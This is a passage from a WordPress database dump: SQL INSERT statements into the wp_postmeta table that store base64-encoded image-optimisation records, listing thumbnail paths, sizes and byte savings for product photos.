C9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdmF6bzg4LTItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzI5OTUsImlkIjoxMzUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem84OC0yLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzg4LTItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvODgtMi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Mjk5NywiaWQiOjEzNTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzg4LTItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvODgtMi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3Zhem84OC0yLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyOTk5LCJpZCI6MTM1M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem84OC0yLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzg4LTItMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvODgtMi0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MTk4LCJ0aW1lIjoxNDgzNTczMDAxLCJpZCI6MTM1M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem84OC0yLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzg4LTItMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvODgtMi0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MjU4LCJ0aW1lIjoxNDgzNTczMDA0LCJpZCI6MTM1M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem84OC0yLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzg4LTItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvODgtMi0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6ODQsInRpbWUiOjE0ODM1NzMwMDYsImlkIjoxMzUzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzg4LTItMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvODgtMi0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3Zhem84OC0yLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMDA4LCJpZCI6MTM1M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem84OC0yLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzg4LTItMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvODgtMi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzAxMCwiaWQiOjEzNTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvODgtMi00MDB4MzIwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem84OC0yLTQwMHgzMjAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiIzMjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdmF6bzg4LTItNDAweDMyMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzMwMTIsImlkIjoxMzUzfV0='); 
INSERT INTO `wp_postmeta` VALUES (29599, 1352, 'wpfc_optimisation_reduction', '33425'); 
INSERT INTO `wp_postmeta` VALUES (29600, 1352, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1ORVcuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LU5FVy5qcGciLCJ3aWR0aCI6NDM2LCJoZWlnaHQiOjMyMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjctTkVXLmpwZyIsInJlZHVjdGlvbiI6MzI3NzksInRpbWUiOjE0ODM1NzMwMTksImlkIjoiMTM1MiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1ORVctMzQweDMyMC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjMyMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LU5FVy0zNDB4MzIwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjctTkVXLTM0MHgzMjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMDIxLCJpZCI6MTM1Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LU5FVy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctTkVXLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02Ny1ORVctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzMwMjMsImlkIjoxMzUyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctTkVXLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1ORVctMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY3LU5FVy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzAyNSwiaWQiOjEzNTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1ORVctMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LU5FVy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjctTkVXLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMDI3LCJpZCI6MTM1Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctTkVXLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1ORVctMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY3LU5FVy0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MjA3LCJ0aW1lIjoxNDgzNTczMDMwLCJpZCI6MTM1Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctTkVXLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1ORVctMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY3LU5FVy0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MzE3LCJ0aW1lIjoxNDgzNTczMDMyLCJpZCI6MTM1Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctTkVXLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1ORVctMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY3LU5FVy0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MTE1LCJ0aW1lIjoxNDgzNTczMDM0LCJpZCI6MTM1Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctTkVXLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1ORVctMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY3LU5FVy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzAzNiwiaWQiOjEzNTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LU5FVy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctTkVXLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02Ny1ORVctMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzMwMzgsImlkIjoxMzUyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1ORVctNDAweDMyMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LU5FVy00MDB4MzIwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiMzIwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjctTkVXLTQwMHgzMjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMDQwLCJpZCI6MTM1Mn1d'); 
INSERT INTO `wp_postmeta` VALUES (29601, 1351, 'wpfc_optimisation_reduction', '32482'); 
INSERT INTO `wp_postmeta` VALUES (29602, 1351, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi1ORVcuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTUyLU5FVy5qcGciLCJ3aWR0aCI6NDM2LCJoZWlnaHQiOjMyMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNTItTkVXLmpwZyIsInJlZHVjdGlvbiI6MzE4MTAsInRpbWUiOjE0ODM1NzMwNDcsImlkIjoiMTM1MSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi1ORVctMzQweDMyMC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjMyMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTUyLU5FVy0zNDB4MzIwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNTItTkVXLTM0MHgzMjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMDQ5LCJpZCI6MTM1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTUyLU5FVy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNTItTkVXLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy01Mi1ORVctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzMwNTEsImlkIjoxMzUxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNTItTkVXLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi1ORVctMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTUyLU5FVy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzA1MywiaWQiOjEzNTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi1ORVctMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTUyLU5FVy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNTItTkVXLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMDU1LCJpZCI6MTM1MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNTItTkVXLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi1ORVctMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTUyLU5FVy0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MjI5LCJ0aW1lIjoxNDgzNTczMDU3LCJpZCI6MTM1MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNTItTkVXLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi1ORVctMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTUyLU5FVy0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MzA5LCJ0aW1lIjoxNDgzNTczMDYwLCJpZCI6MTM1MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNTItTkVXLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi1ORVctMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTUyLU5FVy0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MTI3LCJ0aW1lIjoxNDgzNTczMDYyLCJpZCI6MTM1MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNTItTkVXLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi1ORVctMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTUyLU5FVy0yN